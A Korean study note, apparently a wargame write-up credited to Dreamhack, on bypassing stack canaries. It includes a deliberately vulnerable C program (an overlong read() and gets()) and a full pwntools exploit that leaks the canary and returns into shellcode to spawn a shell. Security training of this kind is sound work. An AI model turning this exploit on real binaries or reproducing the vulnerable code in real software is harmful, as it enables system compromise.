카나리 우회기법

checksec ./파일실행명  # 해당 파일에 적용된 보호기법들을 보여준다. pwntools 설치하면 실행 가능

카나리가 적용되어 있는 것을 확인 

 

카나리가 적용된 기본적인 스택프레임 [출처 : 드림핵]

 

#include <stdio.h>
#include <unistd.h>
int main() {
  char buf[0x50];
  printf("Address of the buf: %p\n", buf);
  printf("Distance between buf and $rbp: %ld\n",
         (char*)__builtin_frame_address(0) - buf); //byte
  printf("[1] Leak the canary\n");
  printf("Input: ");
  fflush(stdout);
  read(0, buf, 0x100);
  printf("Your input is '%s'\n", buf);
  puts("[2] Overwrite the return address");
  printf("Input: ");
  fflush(stdout);
  gets(buf);
  return 0;
}

일단 위의 소스코드 분석부터 해보자

 

- buf의 주소 출력

- buf와 rbp사이의 거리 출력 (즉 buf+ canary만큼의 byte 거리 출력) 

- 첫번째 input : 0x50짜리 buf가 있고 read할때는 0x100을 받게 해놨으므로 스택버퍼오버플로우 취약점이 있다.

- 두번째 input : gets로 받으므로 마찬가지로 취약점

 

익스플로잇 시나리오

 

익스플로잇 코드 

from pwn import *

# 환경 세팅 
p = process("./r2s")
context.arch = "amd64"

# [1] Get information about buf
p.recvuntil("buf: ")
buf = int(p.recvline()[:-1], 16) # 16진수로 buf에 저장 
print("Address of buf", buf)

p.recvuntil("$rbp: ")
buf2sfp = int(p.recvline().split()[0]) # buf에서 rbp까지의 거리(0x60)
buf2cnry = buf2sfp - 8 # buf에서 canary까지의 거리(0x58)

print("buf <=> sfp", hex(buf2sfp))
print("buf <=> canary", hex(buf2cnry))

# [2] Leak canary value
payload = b"A"*(buf2cnry + 1)  # (+1) because of the first null-byte
p.sendafter("Input:", payload) # buf와 카나리 사이를 임의의 값으로 채우면, 카나리 같이 출력(%s는 null byte를 받을때까지 출력하므로!)
p.recvuntil(payload)
cnry = u64(b"\x00"+p.recvn(7)) # 카나리 값 구함 
print("Canary", hex(cnry)) 

# [3] Exploit
sh = asm(shellcraft.sh())
# 0x58만큼 셸코드 + 아무문자 / 0x8만큼 카나리 / 0x8만큼 아무문자(sfp) / ret는 buf로 덮어 셸코드 실행   
payload = sh.ljust(buf2cnry, b"A") + p64(cnry) + b"B"*0x8 + p64(buf) 
# gets() receives input until "\n" is received

print(hex(buf))

p.sendlineafter("Input:", payload)

p.interactive()

 

[출처]

dreamhack